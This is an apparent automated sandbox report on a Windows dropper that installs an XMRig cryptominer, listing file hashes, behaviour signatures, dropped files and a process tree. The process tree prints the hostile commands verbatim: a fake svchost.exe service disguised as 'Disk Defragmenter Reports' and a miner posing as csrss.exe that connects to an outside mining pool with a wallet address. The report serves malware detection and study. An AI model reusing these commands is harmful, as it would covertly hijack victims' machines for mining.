Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23-12-2024 15:20

General

  • Target

    ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe

  • Size

    910KB

  • MD5

    ca0fb79fde083ec2ba5625c6d1c208d8

  • SHA1

    eb215b41f55ac1588d09354f5b1d32d5de92f248

  • SHA256

    ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229

  • SHA512

    e990977492d710767a1847782399ca8078cd74303afabe0a68469d3006ccd6125442cc72e12860f5c04b7cc16fd8e3ddbd3ad6b906abcbb9970d0ca239aebfc7

  • SSDEEP

    12288:SvfyIIIzAClE7uDOch+h2ul/mJot38gi5Y9ND3aHSkRcdT1/zdP1r:esSzlEqF+hVcOfi5YrDAWT9Bdr

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 5 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
    "C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe
      __IRAOFF:520716 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1052
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Temp\run64.bat
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4912
        • C:\ProgramData\Temp\svchost.exe
          C:\ProgramData\Temp\svchost.exe install "Disk Defragmenter Reports" C:\ProgramData\Temp\csrss.exe -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=50
          4⤵
          • Executes dropped EXE
          PID:3916
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 127.0.0.1
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2256
        • C:\Windows\SysWOW64\sc.exe
          sc description "Disk Defragmenter Reports" "┤┼┼╠╦Θ╞¼╒√└φ▒¿╕µ╠ß╣⌐╓º│╓íú"
          4⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:1392
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 2 127.0.0.1
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4932
        • C:\ProgramData\Temp\svchost.exe
          C:\ProgramData\Temp\svchost.exe start "Disk Defragmenter Reports"
          4⤵
          • Executes dropped EXE
          PID:2936
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 127.0.0.1
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4116
  • C:\ProgramData\Temp\svchost.exe
    C:\ProgramData\Temp\svchost.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:860
    • C:\ProgramData\Temp\csrss.exe
      "C:\ProgramData\Temp\csrss.exe" -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=50
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1896

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\Temp\csrss.exe

    Filesize

    413KB

    MD5

    9fb6eb5b8e72e6671765a91f12f273fb

    SHA1

    e476d2caaaf8506d8798cca874ab70f31a23a44f

    SHA256

    9a0db3da87598e4e38a40d8a49bf71e5f708fb3de3b044db0c17ab369041c1b4

    SHA512

    3e2188c99e6cc6dc9062896d628b5df834c629a7000040b46d640f495c93af27b3cf32ac6af8ea88a57e343d0dbb815658cfa6df6c62be8dee208373c9ef2fed

  • C:\ProgramData\Temp\run64.bat

    Filesize

    484B

    MD5

    39a4b61f3776e96201ff30b4f4a28afd

    SHA1

    f293bfe02dd2b058330dce8a3ddab23ac5ea708d

    SHA256

    27ed8d3eab67d1ce02e40542e18d8444f4a9e7989a02cb7f41baf88f9d544d02

    SHA512

    b0cb6592dd5dcac3b31ee6979d04eb564523da1903fe9b0bb47fc331c1af2557aafff9237ad9b9cd849fecbcde13fa482517048a96becaaa8ca58f7216b288c8

  • C:\ProgramData\Temp\svchost.exe

    Filesize

    345KB

    MD5

    1e706b1e8d3bd3764e3ee4bf5fe509d8

    SHA1

    ba457bfcdc1b66609f142c3578be647c51d1356d

    SHA256

    29f0dbf2d07c4b68c3c9ee0d139d80bad3e9058fbf9dbd574cb5b047cf742e74

    SHA512

    f1b6eb345e3114e68a8b78cb711717b60b4604e6ff7578c2df3861187946b05b77259243e5b04c4b7e4a16dd6b1045a94f99cbeb46e5eac9e8c43c82d9e9d924

  • C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe

    Filesize

    440KB

    MD5

    75ca7ff96bf5a316c3af2de6a412bd54

    SHA1

    0a093950790ff0dddff6f5f29c6b02c10997e0c5

    SHA256

    d95b5bf9ca97c1900de5357743282bab655d61d616606485088e1708559b7cf1

    SHA512

    b8da86f2f1e908955254e5168d0447f479cec7815a8b081a7b38eb87187cb2eb992109c67e006361b96bc1529ee8abc9dc477d78e9ca565e43f5415b492771d4

  • memory/1052-4-0x0000000000400000-0x0000000000527000-memory.dmp

    Filesize

    1.2MB

  • memory/1052-33-0x0000000000400000-0x0000000000527000-memory.dmp

    Filesize

    1.2MB